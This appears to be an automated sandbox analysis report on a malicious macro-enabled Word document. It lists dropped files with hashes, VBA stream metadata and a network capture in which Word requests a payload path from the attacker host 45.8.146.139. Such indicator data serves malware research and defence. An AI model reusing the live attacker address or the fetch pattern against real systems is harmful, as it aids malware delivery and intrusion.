                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:50 2022, mtime=Fri Aug 12 00:49:52 2022, atime=Fri Aug 12 00:49:44 2022, length=2248355, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1115
                                                                                                                                              Entropy (8bit):4.700357953541246
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:8gBjEu0U8uElPCH2PQJ2Y88VC+WaKOQl1GTjA2N/rV7p9LrAG9DInRo5k4t2Y+x4:88bJOhEAKThp95DAC67aB6m
                                                                                                                                              MD5:3FE4E7082455A40B3CACDA2714068F60
                                                                                                                                              SHA1:B8520CB7AD8549DEB579DE9820961791BE6E5535
                                                                                                                                              SHA-256:E1922E600A5FAAFFE1B060150557FD7941326BEE950DEBA2ECB0100D2992F799
                                                                                                                                              SHA-512:1673B3C5C195681299C49FCCE4F783188590E93A20E6F90BD290A1BA39251E90DF82DDD68A11DD314CCCA2E633FBD7C12B12C741818B4CBACEC42327B59B8E49
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:L..................F.... .....i..3....`.....P......N"..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U/.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..U/......S......................r.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..U/......Y..............>.......#.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..N"..U7. .CNEWTO~1.DOC..f......hT...U7.....h.........................c.n.e.w.t.o.n. .d.o.c. .0.8...1.1...2.0.2.2...d.o.c.......`...............-......._...........>.S......C:\Users\user\Desktop\cnewton doc 08.11.2022.doc..1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.n.e.w.t.o.n. .d.o.c. .0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...As...`.......X.......610930...........!a..%.H.VZAj...O............-..!a..%.H.VZAj...O............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):103
                                                                                                                                              Entropy (8bit):4.575284965391289
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:bDuMJle+FXF7Uk9TLBCmX1c6FXF7Uk9TLBCv:bCMXF7p9HBCuXF7p9HBs
                                                                                                                                              MD5:883DB290C57C4E606337478F65B9586D
                                                                                                                                              SHA1:0DE009D3CAA7D6FF00C62C71258E8ECF34688E18
                                                                                                                                              SHA-256:1D1108C167D9D37D26F39A551DF8370F7EC2A0A1D608BA7696DC090FB11000C4
                                                                                                                                              SHA-512:3B4349DCD4B6B0471FC1EBBD304B22AB74DE2C1B1672EC62782258DE4800D4C5E4E65AA7CBB748AC7EEA22A88F2009E2CDC6436622AD35F3E90A4E78ABFFCB1F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[folders]..Templates.LNK=0..cnewton doc 08.11.2022.doc.LNK=0..[doc]..cnewton doc 08.11.2022.doc.LNK=0..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):3.1335506491402776
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/Zd3IlUltp4R+MgQ/l2Flj/FlqKeZXt//n:RtZ1IlbxwEz9
                                                                                                                                              MD5:862125B361C3F3D1C58A47A13459013D
                                                                                                                                              SHA1:BCE74CEBDF0D98684B672EEB5B9229933B947033
                                                                                                                                              SHA-256:66E981E3F58E476D8D5746CAAD05697E49A19927EB318229E9C178820A84168E
                                                                                                                                              SHA-512:A53B2B4267D3A07F8AA50DCF227339A3C7C3D66970F9199104C6D467148525D988184D0851C76E1DE188D4756483C1A6579FBE367D94CD7BDCDB92D09FCE27FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h........../.L.1...^.i@..iT..i`..iDB.iZR.i./.L.2..........$.......6C......;/.L.3..............
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):3.1335506491402776
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/Zd3IlUltp4R+MgQ/l2Flj/FlqKeZXt//n:RtZ1IlbxwEz9
                                                                                                                                              MD5:862125B361C3F3D1C58A47A13459013D
                                                                                                                                              SHA1:BCE74CEBDF0D98684B672EEB5B9229933B947033
                                                                                                                                              SHA-256:66E981E3F58E476D8D5746CAAD05697E49A19927EB318229E9C178820A84168E
                                                                                                                                              SHA-512:A53B2B4267D3A07F8AA50DCF227339A3C7C3D66970F9199104C6D467148525D988184D0851C76E1DE188D4756483C1A6579FBE367D94CD7BDCDB92D09FCE27FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h........../.L.1...^.i@..iT..i`..iDB.iZR.i./.L.2..........$.......6C......;/.L.3..............
                                                                                                                                              File type:Zip archive data, at least v2.0 to extract
                                                                                                                                              Entropy (8bit):7.993716519832146
                                                                                                                                              TrID:
                                                                                                                                              • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                              • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                              • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                              File name:cnewton doc 08.11.2022.doc
                                                                                                                                              File size:2343230
                                                                                                                                              MD5:ee1d6eb5b07b99e65fc0cb477193c35c
                                                                                                                                              SHA1:9d4dbf701c8ede93a79036dd5a0316da988a2eeb
                                                                                                                                              SHA256:23b9a20a59041fc7d484957e49ffa7e0f6dba7dbbec0628a4adb69c2e05863ab
                                                                                                                                              SHA512:869cdd01eb85cd12a1a27dc0099250e4fb33b3ed72a7e0375e80206b07b01aaff108ede1626de99f29c9a7cbc7524a4e4947b976be2e392b2d777c8df1fc54fc
                                                                                                                                              SSDEEP:49152:xyG/bJ98ozhp4kBA4Y0bRfqmlYOxtKW72swkql:QS8otukBbRfqUjRy7T
                                                                                                                                              TLSH:C4B5333D16FB0348D87D3A125E1F1EC212BDCD45E01BC82F684B657AB5377846A68EE8
                                                                                                                                              Icon Hash:74f4c4c6c1cac4d8
                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1
                                                                                                                                              Has Summary Info:
                                                                                                                                              Application Name:
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:True
                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                              Contains ObjectPool Stream:False
                                                                                                                                              Flash Objects Count:0
                                                                                                                                              Contains VBA Macros:True
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/ThisDocument
                                                                                                                                              VBA File Name:ThisDocument.cls
                                                                                                                                              Stream Size:2836
                                                                                                                                              Data ASCII:. J . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n . L i . b " u s e r 3 . 2 " A l i a s . " S e t T i m . e r " ( B y V 8 a l . . . . . A s L o n g * , . . . . . . . 5 . . . . . . .

                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECT
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Stream Size:369
                                                                                                                                              Entropy:5.302596554682153
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:I D = " { 1 4 9 A B 1 3 B - 1 5 A A - 4 3 8 2 - 8 9 7 7 - F C 2 5 F 7 E D D 7 B A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 A 3 8 C 5 0 D F B 1 1 F B 1 1 F B 1 1 F B 1 1 " . . D P B = " 7 4 7 6 8 B 4 F F F 8 8 0 0 8 8 0 0 8 8 " . . G C = " A E A C 5 1 9 1 B 1 F 1 E A F 2 E A F 2 1 5 " . . . . [ H o s t E x t e n d e r I n f
                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECTwm
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:41
                                                                                                                                              Entropy:3.0773844850752607
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/_VBA_PROJECT
                                                                                                                                              File Type:ISO-8859 text, with no line terminators
                                                                                                                                              Stream Size:7
                                                                                                                                              Entropy:1.8423709931771088
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:a . . .
                                                                                                                                              Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_2
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:5108
                                                                                                                                              Entropy:1.9370407590218233
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_3
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:2724
                                                                                                                                              Entropy:2.6897674029679903
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/dir
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:486
                                                                                                                                              Entropy:6.304387507848704
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . I d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A - .
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 11, 2022 18:49:57.318861008 CEST | 49741 | 80 | 192.168.2.3 | 45.8.146.139
Aug 11, 2022 18:49:57.422590017 CEST | 80 | 49741 | 45.8.146.139 | 192.168.2.3
Aug 11, 2022 18:49:57.422734022 CEST | 49741 | 80 | 192.168.2.3 | 45.8.146.139
Aug 11, 2022 18:49:57.423239946 CEST | 49741 | 80 | 192.168.2.3 | 45.8.146.139
Aug 11, 2022 18:49:57.526897907 CEST | 80 | 49741 | 45.8.146.139 | 192.168.2.3
Aug 11, 2022 18:49:57.540335894 CEST | 80 | 49741 | 45.8.146.139 | 192.168.2.3
Aug 11, 2022 18:49:57.540467978 CEST | 49741 | 80 | 192.168.2.3 | 45.8.146.139
Aug 11, 2022 18:50:02.545648098 CEST | 80 | 49741 | 45.8.146.139 | 192.168.2.3
Aug 11, 2022 18:50:02.545905113 CEST | 49741 | 80 | 192.168.2.3 | 45.8.146.139
Aug 11, 2022 18:50:46.149507046 CEST | 49741 | 80 | 192.168.2.3 | 45.8.146.139
                                                                                                                                              • 45.8.146.139
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49741 | 45.8.146.139 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Aug 11, 2022 18:49:57.423239946 CEST | 1165 | OUT | GET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 45.8.146.139
                                                                                                                                              Connection: Keep-Alive
Aug 11, 2022 18:49:57.540335894 CEST | 1165 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Thu, 11 Aug 2022 16:49:57 GMT
                                                                                                                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                              Content-Length: 201
                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "-f" was not found on this server.</p></body></html>



                                                                                                                                              Target ID:0
                                                                                                                                              Start time:18:49:45
                                                                                                                                              Start date:11/08/2022
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                              Imagebase:0x8a0000
                                                                                                                                              File size:1937688 bytes
                                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:18:50:32
                                                                                                                                              Start date:11/08/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4160
                                                                                                                                              Imagebase:0xb30000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:18:50:32
                                                                                                                                              Start date:11/08/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4152
                                                                                                                                              Imagebase:0xb30000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              No disassembly